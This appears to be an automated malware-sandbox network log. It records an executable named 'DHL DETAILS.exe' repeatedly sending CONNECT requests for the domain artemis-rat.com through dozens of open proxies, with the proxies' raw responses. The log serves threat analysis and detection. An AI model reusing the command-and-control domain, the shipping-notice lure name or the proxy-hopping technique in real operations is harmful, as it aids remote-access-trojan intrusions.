Mar 9, 2024 13:14:16.402679920 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.557787895 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1027	192.168.2.5	53049	202.83.102.83	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.403136015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1028	192.168.2.5	53263	104.16.105.106	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.420413971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.574820042 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1029	192.168.2.5	53124	46.51.249.135	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.425056934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.695213079 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:16 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1030	192.168.2.5	53256	45.43.239.168	27070	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.434493065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1031	192.168.2.5	53185	95.164.207.157	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.436471939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1032	192.168.2.5	53260	162.214.103.84	14722	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.436767101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.973993063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.568030119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.677238941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.868587017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:23.145329952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1033	192.168.2.5	52531	51.38.63.124	27294	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.441337109 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.536441088 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1034	192.168.2.5	53065	47.96.145.14	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.442466021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.795603037 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1035	192.168.2.5	53242	162.241.46.6	64353	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.442759991 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.036393881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724183083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036603928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.520987988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:24.020785093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.411216974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.333631992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1036	192.168.2.5	53057	183.230.162.122	9091	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.444636106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.822798014 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1037	192.168.2.5	53130	188.166.17.18	8881	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.469944954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1038	192.168.2.5	53054	103.190.54.141	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.472445011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1039	192.168.2.5	53131	51.210.223.9	3000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.473820925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1040	192.168.2.5	53119	58.234.116.197	8197	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.473905087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1041	192.168.2.5	53128	203.218.172.225	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.484255075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1042	192.168.2.5	53047	122.114.232.137	808	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.500627995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1043	192.168.2.5	53179	198.105.101.129	5758	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.500941038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.019242048 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1044	192.168.2.5	50850	154.118.228.212	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.501370907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1045	192.168.2.5	53286	172.67.182.96	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.505125999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.659395933 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1046	192.168.2.5	53188	18.169.83.87	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.505800009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.796792984 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:16 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1047	192.168.2.5	50945	52.80.19.207	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.507606030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1048	192.168.2.5	53144	159.223.71.71	54370	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.512695074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.223916054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.333384037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1049	192.168.2.5	50995	46.241.57.29	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.518398046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1050	192.168.2.5	50432	103.97.179.115	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.522985935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1051	192.168.2.5	53156	43.133.70.57	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.522986889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1052	192.168.2.5	53136	8.222.164.205	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.523921013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1053	192.168.2.5	53186	34.92.12.210	9238	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.528028011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.838654995 CET	28	IN	HTTP/1.1 502 Bad Gateway

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1054	192.168.2.5	53206	221.153.92.39	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:16.535382986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

